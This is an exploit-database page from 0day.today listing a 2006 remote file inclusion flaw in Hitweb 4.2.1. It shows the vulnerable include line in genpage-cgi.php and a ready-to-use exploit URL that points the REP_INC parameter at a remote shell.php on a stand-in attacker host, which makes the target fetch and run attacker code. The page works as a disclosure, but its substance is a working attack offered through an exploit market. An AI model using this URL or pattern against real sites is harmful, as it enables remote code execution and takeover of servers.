[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Hitweb <= 4.2.1 (REP_INC) Remote File Include Vulnerability

Author
Drago84
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-664
Category
web applications
Date add
07-08-2006
Platform
unsorted
===========================================================
Hitweb <= 4.2.1 (REP_INC) Remote File Include Vulnerability
===========================================================



Hitweb 4.2 Remote Include File

CreW: ToxiC

Bug Found By Drago84

Sorce Code:
http://freshmeat.net/redir/hitweb/15633/url_tgz/hitweb-4.2_php.tgz

Problem is:
include "$REP_INC/lib_database.php";

Page:
genpage-cgi.php

Path:
Declare $REP_INC

Expl:
http://www.site.com/dir_hitweb/genpage-cgi.php?REP_INC=http://www.evalsite.com/shell.php?



#  0day.today [2024-12-25]  #